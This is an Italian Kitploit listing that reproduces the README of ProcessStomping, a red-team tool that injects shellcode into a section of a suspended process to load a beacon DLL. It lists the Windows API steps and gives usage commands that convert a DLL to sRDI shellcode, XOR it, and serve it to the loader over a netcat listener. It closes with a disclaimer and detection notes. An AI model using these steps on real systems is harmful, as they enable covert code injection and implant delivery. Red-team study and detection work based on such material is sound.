Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/naksyn/processstomping
ShellcodePost-ExploitApprendimento e FormazioneRed TeamingSviluppo PayloadBinary Exploitation
GitHubnaksyn/processstomping

ProcessStomping

Una variazione di ProcessOverwriting per eseguire shellcode su una sezione di un eseguibile

Vedi Repository
147272 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ProcessStomping

Una variazione del ProcessOverwriting per eseguire shellcode su una sezione di un eseguibile

Twitter

Cos'è

Per una spiegazione più dettagliata puoi leggere il mio post del blog

Process Stomping è una variazione del Process Overwriting di hasherezade e ha il vantaggio di scrivere un payload shellcode su una sezione bersaglio invece di scrivere un intero payload PE nello spazio degli indirizzi del processo ospite.

Questi sono i passaggi principali della tecnica ProcessStomping:

  1. CreateProcess - impostando il flag di creazione del processo a CREATE_SUSPENDED (0x00000004) per sospendere il thread primario del processo.
  2. WriteProcessMemory - utilizzato per scrivere ogni shellcode dannoso nella sezione del processo di destinazione.
  3. SetThreadContext - utilizzato per puntare il punto di ingresso a una nuova sezione di codice che è stata scritta.
  4. ResumeThread - autoesplicativo.

Come esempio di applicazione della tecnica, il PoC può essere utilizzato con sRDI per caricare una dll beacon su una sezione RWX di un eseguibile. L'immagine seguente descrive i passaggi coinvolti.

immagine

Dichiarazione di non responsabilità

Tutte le informazioni e i contenuti sono forniti solo a scopo educativo. Segui le istruzioni a tuo rischio. Né l'autore né il suo datore di lavoro sono responsabili per danni diretti o consequenziali o perdite derivanti da qualsiasi persona o organizzazione.

Crediti

Questo lavoro è stato reso possibile grazie alla conoscenza e agli strumenti condivisi da Aleksandra Doniec @hasherezade e Nick Landers.

Utilizzo

Seleziona il tuo processo di destinazione e modifica le variabili globali di conseguenza in ProcessStomping.cpp.

Compila il progetto sRDI assicurandoti che l'offset sia sufficiente per saltare oltre il blob shellcode sRDI generato, quindi aggiorna gli strumenti sRDI:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Genera un payload dll senza Reflective Loader a tua scelta, quindi genera il blob shellcode sRDI:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

Il blob shellcode può quindi essere xorato con una parola chiave e scaricato utilizzando un semplice socket

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

Consegna il blob xorato alla connessione

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

Il blob sRDI verrà cancellato dopo l'esecuzione per rimuovere artefatti non necessari.

Demo

https://github.com/naksyn/ProcessStomping/assets/59816245/8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50

Avvertenze

Per eseguire con successo questa tecnica, dovresti selezionare il processo di destinazione giusto e utilizzare un payload dll che non includa un Reflective Loader definito dall'utente.

Opportunità di rilevamento

La tecnica Process Stomping richiede di avviare il processo di destinazione in uno stato sospeso, modificare il punto di ingresso del thread e poi riprendere il thread per eseguire lo shellcode iniettato. Queste sono operazioni che potrebbero essere considerate sospette se eseguite in rapida successione e potrebbero portare a un maggiore scrutinio da parte di alcune soluzioni di sicurezza.

Scarica lo strumento